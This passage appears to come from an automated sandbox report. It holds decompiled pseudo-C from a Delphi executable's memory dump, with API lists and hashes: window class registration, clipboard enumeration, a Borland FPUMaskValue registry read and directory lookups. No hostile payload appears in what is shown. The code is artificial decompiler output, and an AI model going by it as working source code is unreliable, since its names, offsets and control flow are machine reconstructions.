                                                                        					}
                                                                        					 *((intOrPtr*)(_t85 + 0x20c)) = 0;
                                                                        					goto L12;
                                                                        				}
                                                                        				_t68 = E00439AB4( *((intOrPtr*)(__eax + 0x30))) - 1;
                                                                        				if(_t68 >= 0) {
                                                                        					_v8 = _t68 + 1;
                                                                        					_t108 = 0;
                                                                        					do {
                                                                        						_t71 = E00439A78( *((intOrPtr*)(_t85 + 0x30)), _t108);
                                                                        						_t102 =  *0x46af2c; // 0x46af78
                                                                        						if(E00403768(_t71, _t102) != 0 && _t85 != E00439A78( *((intOrPtr*)(_t85 + 0x30)), _t108) && _t110 ==  *((intOrPtr*)(E00439A78( *((intOrPtr*)(_t85 + 0x30)), _t108) + 0x20c))) {
                                                                        							_v24 =  *((intOrPtr*)(_t110 + 8));
                                                                        							_v20 = 0xb;
                                                                        							_v16 =  *((intOrPtr*)(E00439A78( *((intOrPtr*)(_t85 + 0x30)), _t108) + 8));
                                                                        							_v12 = 0xb;
                                                                        							_t89 =  *0x495c08; // 0x468cbc
                                                                        							E0040A274(_t85, _t89, 1, _t108, _t110, 1,  &_v24);
                                                                        							E00403DA8();
                                                                        						}
                                                                        						_t108 = _t108 + 1;
                                                                        						_t16 =  &_v8;
                                                                        						 *_t16 = _v8 - 1;
                                                                        					} while ( *_t16 != 0);
                                                                        				}
                                                                        			}
























                                                                        0x00471cb7
                                                                        0x00471cba
                                                                        0x00471ccb
                                                                        0x00471cce
                                                                        0x00471cd8
                                                                        0x00471ce5
                                                                        0x00471cea
                                                                        0x00471cea
                                                                        0x00471cef
                                                                        0x00471cf0
                                                                        0x00471cf0
                                                                        0x00471cf0
                                                                        0x00471c7b

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID: x@$TDBEdit$TDBMemo
                                                                        • API String ID: 3850602802-3284963328
                                                                        • Opcode ID: 5787c22cd92ee096d9780655317fffe5fa6868f4420593c71e48df5261de8e88
                                                                        • Instruction ID: d5e860475c8fb5d570ea0d8d9322d81bf70e85d28bf0087e7759142a1a5dafb3
                                                                        • Opcode Fuzzy Hash: 5787c22cd92ee096d9780655317fffe5fa6868f4420593c71e48df5261de8e88
                                                                        • Instruction Fuzzy Hash: D34190707002405BCB10FF6EC98269A77A9AF44709F60957BEC48AB3A6C678DD05CB9D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 84%
                                                                        			E00439D3C(intOrPtr* __eax, intOrPtr __ebx, void* __edi, void* __esi) {
                                                                        				char _v68;
                                                                        				struct _WNDCLASSA _v108;
                                                                        				intOrPtr _v116;
                                                                        				signed char _v137;
                                                                        				void* _v144;
                                                                        				struct _WNDCLASSA _v184;
                                                                        				char _v188;
                                                                        				char _v192;
                                                                        				char _v196;
                                                                        				int _t47;
                                                                        				void* _t48;
                                                                        				intOrPtr _t75;
                                                                        				intOrPtr _t93;
                                                                        				intOrPtr _t97;
                                                                        				void* _t98;
                                                                        				intOrPtr* _t100;
                                                                        				void* _t104;
                                                                        
                                                                        				_t98 = __edi;
                                                                        				_t83 = __ebx;
                                                                        				_push(__ebx);
                                                                        				_v196 = 0;
                                                                        				_t100 = __eax;
                                                                        				_push(_t104);
                                                                        				_push(0x439ec7);
                                                                        				_push( *[fs:eax]);
                                                                        				 *[fs:eax] = _t104 + 0xffffff40;
                                                                        				_t84 =  *__eax;
                                                                        				 *((intOrPtr*)( *__eax + 0x98))();
                                                                        				if(_v116 != 0 || (_v137 & 0x00000040) == 0) {
                                                                        					L7:
                                                                        					 *((intOrPtr*)(_t100 + 0x174)) = _v108.lpfnWndProc;
                                                                        					_t47 = GetClassInfoA(_v108.hInstance,  &_v68,  &_v184);
                                                                        					asm("sbb eax, eax");
                                                                        					_t48 = _t47 + 1;
                                                                        					if(_t48 == 0 || E004333D8 != _v184.lpfnWndProc) {
                                                                        						if(_t48 != 0) {
                                                                        							UnregisterClassA( &_v68, _v108.hInstance);
                                                                        						}
                                                                        						_v108.lpfnWndProc = E004333D8;
                                                                        						_v108.lpszClassName =  &_v68;
                                                                        						if(RegisterClassA( &_v108) == 0) {
                                                                        							E0040B330(_t83, _t84, _t98, _t100);
                                                                        						}
                                                                        					}
                                                                        					 *0x47a8ac = _t100;
                                                                        					_t85 =  *_t100;
                                                                        					 *((intOrPtr*)( *_t100 + 0x9c))();
                                                                        					if( *((intOrPtr*)(_t100 + 0x180)) == 0) {
                                                                        						E0040B330(_t83, _t85, _t98, _t100);
                                                                        					}
                                                                        					E00408E50( *((intOrPtr*)(_t100 + 0x64)));
                                                                        					 *((intOrPtr*)(_t100 + 0x64)) = 0;
                                                                        					E0043CF3C(_t100);
                                                                        					E00437760(_t100, E0041F478( *((intOrPtr*)(_t100 + 0x68)), _t83, _t85), 0x30, 1);
                                                                        					_t117 =  *((char*)(_t100 + 0x5c));
                                                                        					if( *((char*)(_t100 + 0x5c)) != 0) {
                                                                        						E004037D8(_t100, _t117);
                                                                        					}
                                                                        					_pop(_t93);
                                                                        					 *[fs:eax] = _t93;
                                                                        					_push(0x439ece);
                                                                        					return E00404348( &_v196);
                                                                        				} else {
                                                                        					_t83 =  *((intOrPtr*)(__eax + 4));
                                                                        					if(_t83 == 0 || ( *(_t83 + 0x1c) & 0x00000002) == 0) {
                                                                        						L6:
                                                                        						_v192 =  *((intOrPtr*)(_t100 + 8));
                                                                        						_v188 = 0xb;
                                                                        						_t75 =  *0x495b10; // 0x41d584
                                                                        						E00406548(_t75,  &_v196);
                                                                        						_t84 = _v196;
                                                                        						E0040A1B8(_t83, _v196, 1, _t98, _t100, 0,  &_v192);
                                                                        						E00403DA8();
                                                                        					} else {
                                                                        						_t97 =  *0x4323f0; // 0x43243c
                                                                        						if(E00403768(_t83, _t97) == 0) {
                                                                        							goto L6;
                                                                        						}
                                                                        						_v116 = E0043CC2C(_t83);
                                                                        					}
                                                                        					goto L7;
                                                                        				}
                                                                        			}

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Class$InfoRegisterUnregister
                                                                        • String ID: <$C$@
                                                                        • API String ID: 3749476976-2018183516
                                                                        • Opcode ID: f13af5d5012fe8f2965f5b7121bc98c74dca3209477202ed70a0ef0fc273b36d
                                                                        • Instruction ID: 2c6ec2fd4a1584ed8ef345fd1b634a2f873c5482398d3f71bf8bca164ddd66ba
                                                                        • Opcode Fuzzy Hash: f13af5d5012fe8f2965f5b7121bc98c74dca3209477202ed70a0ef0fc273b36d
                                                                        • Instruction Fuzzy Hash: 4D417E71A003189BDB20EB65CC42BDE77E9AF48304F4054BAE849E7391DB78AD45CB59
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00409F40(intOrPtr* __eax, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
                                                                        				intOrPtr _v8;
                                                                        				intOrPtr _v12;
                                                                        				char _v273;
                                                                        				char _v534;
                                                                        				char _v790;
                                                                        				struct _MEMORY_BASIC_INFORMATION _v820;
                                                                        				char _v824;
                                                                        				intOrPtr _v828;
                                                                        				char _v832;
                                                                        				intOrPtr _v836;
                                                                        				char _v840;
                                                                        				intOrPtr _v844;
                                                                        				char _v848;
                                                                        				char* _v852;
                                                                        				char _v856;
                                                                        				char _v860;
                                                                        				char _v1116;
                                                                        				void* __edi;
                                                                        				struct HINSTANCE__* _t40;
                                                                        				intOrPtr _t51;
                                                                        				struct HINSTANCE__* _t53;
                                                                        				void* _t69;
                                                                        				long _t72;
                                                                        				void* _t73;
                                                                        				intOrPtr _t74;
                                                                        				intOrPtr _t75;
                                                                        				intOrPtr _t83;
                                                                        				intOrPtr _t86;
                                                                        				intOrPtr* _t87;
                                                                        
                                                                        				_v8 = __ecx;
                                                                        				_t73 = __edx;
                                                                        				_t87 = __eax;
                                                                        				VirtualQuery(__edx,  &_v820, 0x1c);
                                                                        				if(_v820.State != 0x1000) {
                                                                        					L2:
                                                                        					_t40 =  *0x496714; // 0x400000
                                                                        					GetModuleFileNameA(_t40,  &_v534, 0x105);
                                                                        					_v12 = E00409F34(_t73);
                                                                        					L4:
                                                                        					E00408C5C( &_v273, 0x104, E0040ACE8(0x5c, _t89) + 1);
                                                                        					_t74 = 0x40a0c0;
                                                                        					_t86 = 0x40a0c0;
                                                                        					_t83 =  *0x4077d4; // 0x407820
                                                                        					if(E00403768(_t87, _t83) != 0) {
                                                                        						_t74 = E004047F8( *((intOrPtr*)(_t87 + 4)));
                                                                        						_t69 = E00408BF8(_t74, 0x40a0c0);
                                                                        						if(_t69 != 0 &&  *((char*)(_t74 + _t69 - 1)) != 0x2e) {
                                                                        							_t86 = 0x40a0c4;
                                                                        						}
                                                                        					}
                                                                        					_t51 =  *0x495c1c; // 0x407594
                                                                        					_t16 = _t51 + 4; // 0xffe7
                                                                        					_t53 =  *0x496714; // 0x400000
                                                                        					LoadStringA(E00405AAC(_t53),  *_t16,  &_v790, 0x100);
                                                                        					E0040352C( *_t87,  &_v1116);
                                                                        					_v860 =  &_v1116;
                                                                        					_v856 = 4;
                                                                        					_v852 =  &_v273;
                                                                        					_v848 = 6;
                                                                        					_v844 = _v12;
                                                                        					_v840 = 5;
                                                                        					_v836 = _t74;
                                                                        					_v832 = 6;
                                                                        					_v828 = _t86;
                                                                        					_v824 = 6;
                                                                        					E0040932C(_v8,  &_v790, _a4, 4,  &_v860);
                                                                        					return E00408BF8(_v8, _t86);
                                                                        				}
                                                                        				_t72 = GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105);
                                                                        				_t89 = _t72;
                                                                        				if(_t72 != 0) {
                                                                        					_t75 = _t73 - _v820.AllocationBase;
                                                                        					__eflags = _t75;
                                                                        					_v12 = _t75;
                                                                        					goto L4;
                                                                        				}
                                                                        				goto L2;
                                                                        			}

                                                                        APIs
                                                                        • VirtualQuery.KERNEL32(?,?,0000001C), ref: 00409F5D
                                                                        • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 00409F81
                                                                        • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 00409F9C
                                                                        • LoadStringA.USER32 ref: 0040A032
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: FileModuleName$LoadQueryStringVirtual
                                                                        • String ID: x@
                                                                        • API String ID: 3990497365-1446391196
                                                                        • Opcode ID: 675b2fcfc3af4e0b804cb0a88e9fa82d5beafd49b275f10cabf8e41c51dc7240
                                                                        • Instruction ID: 8b082e9917efa6b49bae10a68e7f34f77849aa4765b44cfb24a4ba26b6d89490
                                                                        • Opcode Fuzzy Hash: 675b2fcfc3af4e0b804cb0a88e9fa82d5beafd49b275f10cabf8e41c51dc7240
                                                                        • Instruction Fuzzy Hash: CA412E70A002589BDB21DF69CD85BDAB7BCAB08304F0040FAA548F7292D7799F948F59
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00409F3E(intOrPtr* __eax, intOrPtr __ecx, void* __edx, intOrPtr _a4) {
                                                                        				intOrPtr _v8;
                                                                        				intOrPtr _v12;
                                                                        				char _v273;
                                                                        				char _v534;
                                                                        				char _v790;
                                                                        				struct _MEMORY_BASIC_INFORMATION _v820;
                                                                        				char _v824;
                                                                        				intOrPtr _v828;
                                                                        				char _v832;
                                                                        				intOrPtr _v836;
                                                                        				char _v840;
                                                                        				intOrPtr _v844;
                                                                        				char _v848;
                                                                        				char* _v852;
                                                                        				char _v856;
                                                                        				char _v860;
                                                                        				char _v1116;
                                                                        				void* __edi;
                                                                        				struct HINSTANCE__* _t40;
                                                                        				intOrPtr _t51;
                                                                        				struct HINSTANCE__* _t53;
                                                                        				void* _t69;
                                                                        				long _t72;
                                                                        				void* _t74;
                                                                        				intOrPtr _t75;
                                                                        				intOrPtr _t77;
                                                                        				intOrPtr _t85;
                                                                        				intOrPtr _t89;
                                                                        				intOrPtr* _t92;
                                                                        
                                                                        				_v8 = __ecx;
                                                                        				_t74 = __edx;
                                                                        				_t92 = __eax;
                                                                        				VirtualQuery(__edx,  &_v820, 0x1c);
                                                                        				if(_v820.State != 0x1000) {
                                                                        					L3:
                                                                        					_t40 =  *0x496714; // 0x400000
                                                                        					GetModuleFileNameA(_t40,  &_v534, 0x105);
                                                                        					_v12 = E00409F34(_t74);
                                                                        				} else {
                                                                        					_t72 = GetModuleFileNameA(_v820.AllocationBase,  &_v534, 0x105);
                                                                        					_t101 = _t72;
                                                                        					if(_t72 != 0) {
                                                                        						_t77 = _t74 - _v820.AllocationBase;
                                                                        						__eflags = _t77;
                                                                        						_v12 = _t77;
                                                                        					} else {
                                                                        						goto L3;
                                                                        					}
                                                                        				}
                                                                        				E00408C5C( &_v273, 0x104, E0040ACE8(0x5c, _t101) + 1);
                                                                        				_t75 = 0x40a0c0;
                                                                        				_t89 = 0x40a0c0;
                                                                        				_t85 =  *0x4077d4; // 0x407820
                                                                        				if(E00403768(_t92, _t85) != 0) {
                                                                        					_t75 = E004047F8( *((intOrPtr*)(_t92 + 4)));
                                                                        					_t69 = E00408BF8(_t75, 0x40a0c0);
                                                                        					if(_t69 != 0 &&  *((char*)(_t75 + _t69 - 1)) != 0x2e) {
                                                                        						_t89 = 0x40a0c4;
                                                                        					}
                                                                        				}
                                                                        				_t51 =  *0x495c1c; // 0x407594
                                                                        				_t16 = _t51 + 4; // 0xffe7
                                                                        				_t53 =  *0x496714; // 0x400000
                                                                        				LoadStringA(E00405AAC(_t53),  *_t16,  &_v790, 0x100);
                                                                        				E0040352C( *_t92,  &_v1116);
                                                                        				_v860 =  &_v1116;
                                                                        				_v856 = 4;
                                                                        				_v852 =  &_v273;
                                                                        				_v848 = 6;
                                                                        				_v844 = _v12;
                                                                        				_v840 = 5;
                                                                        				_v836 = _t75;
                                                                        				_v832 = 6;
                                                                        				_v828 = _t89;
                                                                        				_v824 = 6;
                                                                        				E0040932C(_v8,  &_v790, _a4, 4,  &_v860);
                                                                        				return E00408BF8(_v8, _t89);
                                                                        			}

                                                                        APIs
                                                                        • VirtualQuery.KERNEL32(?,?,0000001C), ref: 00409F5D
                                                                        • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 00409F81
                                                                        • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 00409F9C
                                                                        • LoadStringA.USER32 ref: 0040A032
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: FileModuleName$LoadQueryStringVirtual
                                                                        • String ID: x@
                                                                        • API String ID: 3990497365-1446391196
                                                                        • Opcode ID: 9a548920c42f45fa99c43c4b2d529c9c7306f1bd2938faf4c3a7a4c4b8425f55
                                                                        • Instruction ID: ae1d460a213a262a2de6a5e3c25968941e4e7f8d5fcce27913c57a7a7444fe46
                                                                        • Opcode Fuzzy Hash: 9a548920c42f45fa99c43c4b2d529c9c7306f1bd2938faf4c3a7a4c4b8425f55
                                                                        • Instruction Fuzzy Hash: 36412F70A002589BDB21DF69CD85BDAB7BCAB08304F0040FAB548F7292D7799F948F59
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 68%
                                                                        			E0042FBE8(intOrPtr* __eax, void* __edx) {
                                                                        				intOrPtr* _v8;
                                                                        				void* __ecx;
                                                                        				void* __ebp;
                                                                        				void* _t16;
                                                                        				void* _t20;
                                                                        				void* _t24;
                                                                        				void* _t25;
                                                                        				signed short _t26;
                                                                        				void* _t28;
                                                                        				intOrPtr _t29;
                                                                        				intOrPtr _t38;
                                                                        				void* _t42;
                                                                        				void* _t43;
                                                                        				void* _t45;
                                                                        				void* _t48;
                                                                        				intOrPtr _t51;
                                                                        
                                                                        				_t43 = __edx;
                                                                        				_v8 = __eax;
                                                                        				 *((intOrPtr*)( *_v8 + 0x18))(_t42, _t45, _t25, _t28, _t48);
                                                                        				_push(_t51);
                                                                        				_push(0x42fc8a);
                                                                        				_push( *[fs:edx]);
                                                                        				 *[fs:edx] = _t51;
                                                                        				_t26 = EnumClipboardFormats(0);
                                                                        				_t52 = _t26;
                                                                        				if(_t26 == 0) {
                                                                        					L4:
                                                                        					_t29 =  *0x495908; // 0x41d78c
                                                                        					E0040A238(_t29, 1);
                                                                        					E00403DA8();
                                                                        					__eflags = 0;
                                                                        					_pop(_t38);
                                                                        					 *[fs:eax] = _t38;
                                                                        					return  *((intOrPtr*)( *_v8 + 0x14))(0x42fc91);
                                                                        				} else {
                                                                        					while(1) {
                                                                        						_t16 = E004224D0(_t26, _t52);
                                                                        						_t53 = _t16;
                                                                        						if(_t16 != 0) {
                                                                        							break;
                                                                        						}
                                                                        						_t26 = EnumClipboardFormats(_t26 & 0x0000ffff);
                                                                        						__eflags = _t26;
                                                                        						if(__eflags != 0) {
                                                                        							continue;
                                                                        						} else {
                                                                        							goto L4;
                                                                        						}
                                                                        						goto L6;
                                                                        					}
                                                                        					_t20 = GetClipboardData(_t26 & 0x0000ffff);
                                                                        					E004223E0(_t43, _t20, _t26, _t53, GetClipboardData(9));
                                                                        					_t24 = E00403E54();
                                                                        					return _t24;
                                                                        				}
                                                                        				L6:
                                                                        			}

                                                                        APIs
                                                                        • EnumClipboardFormats.USER32(00000000,00000000,0042FC8A), ref: 0042FC0C
                                                                        • GetClipboardData.USER32 ref: 0042FC2C
                                                                        • GetClipboardData.USER32 ref: 0042FC35
                                                                        • EnumClipboardFormats.USER32(00000000,00000000,00000000,0042FC8A), ref: 0042FC51
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Clipboard$DataEnumFormats
                                                                        • String ID: x@
                                                                        • API String ID: 1256399260-1446391196
                                                                        • Opcode ID: 5a6158a96a4f1d023fa36d5631eca6709ac33564e94456df72d8ef5d7ea42a59
                                                                        • Instruction ID: 6727d5747eb2cfb6d4763b554848f51aca0207427aa4671af987d0115a5538be
                                                                        • Opcode Fuzzy Hash: 5a6158a96a4f1d023fa36d5631eca6709ac33564e94456df72d8ef5d7ea42a59
                                                                        • Instruction Fuzzy Hash: CC110630704214AFD700FF6BE95292A77E9EF853587A0407BFC04D7381C939AC05D669
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 65%
                                                                        			E00403454() {
                                                                        				void* _v8;
                                                                        				char _v12;
                                                                        				int _v16;
                                                                        				signed short _t12;
                                                                        				signed short _t14;
                                                                        				intOrPtr _t27;
                                                                        				void* _t29;
                                                                        				void* _t31;
                                                                        				intOrPtr _t32;
                                                                        
                                                                        				_t29 = _t31;
                                                                        				_t32 = _t31 + 0xfffffff4;
                                                                        				_v12 =  *0x47a00c & 0x0000ffff;
                                                                        				if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Borland\\Delphi\\RTL", 0, 1,  &_v8) != 0) {
                                                                        					_t12 =  *0x47a00c; // 0x1332
                                                                        					_t14 = _t12 & 0x0000ffc0 | _v12 & 0x0000003f;
                                                                        					 *0x47a00c = _t14;
                                                                        					return _t14;
                                                                        				} else {
                                                                        					_push(_t29);
                                                                        					_push(E004034C5);
                                                                        					_push( *[fs:eax]);
                                                                        					 *[fs:eax] = _t32;
                                                                        					_v16 = 4;
                                                                        					RegQueryValueExA(_v8, "FPUMaskValue", 0, 0,  &_v12,  &_v16);
                                                                        					_pop(_t27);
                                                                        					 *[fs:eax] = _t27;
                                                                        					_push(0x4034cc);
                                                                        					return RegCloseKey(_v8);
                                                                        				}
                                                                        			}













                                                                        APIs
                                                                        • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403476
                                                                        • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,004034C5,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 004034A9
                                                                        • RegCloseKey.ADVAPI32(?,004034CC,00000000,?,00000004,00000000,004034C5,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 004034BF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: CloseOpenQueryValue
                                                                        • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                        • API String ID: 3677997916-4173385793
                                                                        • Opcode ID: 350ae91fbd18333f4bfa6cae6bba187b28a893344676598df037652048d21920
                                                                        • Instruction ID: 120532c505e53d0c70db7bdd28f63d547cb0a312e52158abe3e5b934d02c6540
                                                                        • Opcode Fuzzy Hash: 350ae91fbd18333f4bfa6cae6bba187b28a893344676598df037652048d21920
                                                                        • Instruction Fuzzy Hash: F001B575510308BAE711EF91CC42BAE7BACD704B05F1045B6F908F65D0E6799A10C75C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00402924(void* __eax, void* __edx) {
                                                                        				char _v271;
                                                                        				char _v532;
                                                                        				char _v534;
                                                                        				char _v535;
                                                                        				void* _t21;
                                                                        				void* _t25;
                                                                        				CHAR* _t26;
                                                                        
                                                                        				_t25 = __edx;
                                                                        				_t21 = __eax;
                                                                        				if(__eax != 0) {
                                                                        					 *_t26 = 0x40;
                                                                        					_v535 = 0x3a;
                                                                        					_v534 = 0;
                                                                        					GetCurrentDirectoryA(0x105,  &_v271);
                                                                        					SetCurrentDirectoryA(_t26);
                                                                        				}
                                                                        				GetCurrentDirectoryA(0x105,  &_v532);
                                                                        				if(_t21 != 0) {
                                                                        					SetCurrentDirectoryA( &_v271);
                                                                        				}
                                                                        				return E004045B0(_t25, 0x105,  &_v532);
                                                                        			}











                                                                        APIs
                                                                        • GetCurrentDirectoryA.KERNEL32(00000105,?,?,?,0046650B), ref: 00402956
                                                                        • SetCurrentDirectoryA.KERNEL32(?,00000105,?,?,?,0046650B), ref: 0040295C
                                                                        • GetCurrentDirectoryA.KERNEL32(00000105,?,?,?,0046650B), ref: 0040296B
                                                                        • SetCurrentDirectoryA.KERNEL32(?,00000105,?,?,?,0046650B), ref: 0040297C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: CurrentDirectory
                                                                        • String ID: :
                                                                        • API String ID: 1611563598-336475711
                                                                        • Opcode ID: d2c8346d54f6d26374d7a20a1d44905b814254075feb8a7149b64a100b0b6c82
                                                                        • Instruction ID: 65af94f08173e3417ccc1a5c10f762e489d2bb018a98be52c56f19f3046a90dd
                                                                        • Opcode Fuzzy Hash: d2c8346d54f6d26374d7a20a1d44905b814254075feb8a7149b64a100b0b6c82
                                                                        • Instruction Fuzzy Hash: 01F096622487805ED310E6788856BDB73DC9F55704F04846EBAC8E73C2F6B889449767
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 93%
                                                                        			E0045CDD8(signed int __eax, long __ecx, char __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
                                                                        				signed int _v8;
                                                                        				long _v12;
                                                                        				char _v16;
                                                                        				signed int _v17;
                                                                        				struct tagRECT _v33;
                                                                        				struct tagRECT _v49;
                                                                        				struct tagRECT _v65;
                                                                        				void* __edi;
                                                                        				void* __ebp;
                                                                        				intOrPtr _t138;
                                                                        				intOrPtr _t148;
                                                                        				signed int _t163;
                                                                        				signed int _t166;
                                                                        				intOrPtr _t167;
                                                                        				intOrPtr _t180;
                                                                        				intOrPtr _t181;
                                                                        				intOrPtr _t182;
                                                                        				intOrPtr _t183;
                                                                        				signed int _t188;
                                                                        				intOrPtr _t201;
                                                                        				intOrPtr _t202;
                                                                        				intOrPtr _t205;
                                                                        				intOrPtr _t206;
                                                                        				intOrPtr _t232;
                                                                        				intOrPtr _t233;
                                                                        				intOrPtr _t234;
                                                                        				intOrPtr _t235;
                                                                        				intOrPtr _t236;
                                                                        				intOrPtr _t238;
                                                                        				intOrPtr* _t240;
                                                                        				signed int _t252;
                                                                        				intOrPtr _t253;
                                                                        				intOrPtr _t256;
                                                                        				signed int _t257;
                                                                        				void* _t265;
                                                                        
                                                                        				_v12 = __ecx;
                                                                        				_v8 = __eax;
                                                                        				_t240 = _a24 + 0xfffffffc;
                                                                        				_v16 = __edx;
                                                                        				_v49.top = _a20;
                                                                        				while(1) {
                                                                        					_t138 = _v49.top;
                                                                        					if(_t138 >= _a12) {
                                                                        						break;
                                                                        					}
                                                                        					_t138 =  *((intOrPtr*)( *_t240 + 0x24c));
                                                                        					if(_t138 > _v16) {
                                                                        						_t257 = _v8;
                                                                        						_v49.left = _v12;
                                                                        						_v49.bottom = E004607E0( *_t240, _v16) + _v49.top;
                                                                        						while(1) {
                                                                        							__eflags = _v49.left - _a16;
                                                                        							if(_v49.left >= _a16) {
                                                                        								break;
                                                                        							}
                                                                        							_t148 =  *_t240;
                                                                        							__eflags = _t257 -  *((intOrPtr*)(_t148 + 0x21c));
                                                                        							if(_t257 <  *((intOrPtr*)(_t148 + 0x21c))) {
                                                                        								_v49.right = E004607C0( *_t240, _t257) + _v49.left;
                                                                        								__eflags = _v49.right - _v49.left;
                                                                        								if(_v49.right <= _v49.left) {
                                                                        									L39:
                                                                        									_v49.left =  *((intOrPtr*)(_a24 - 0x70)) + _v49.right;
                                                                        									_t257 = _t257 + 1;
                                                                        									__eflags = _t257;
                                                                        									continue;
                                                                        								}
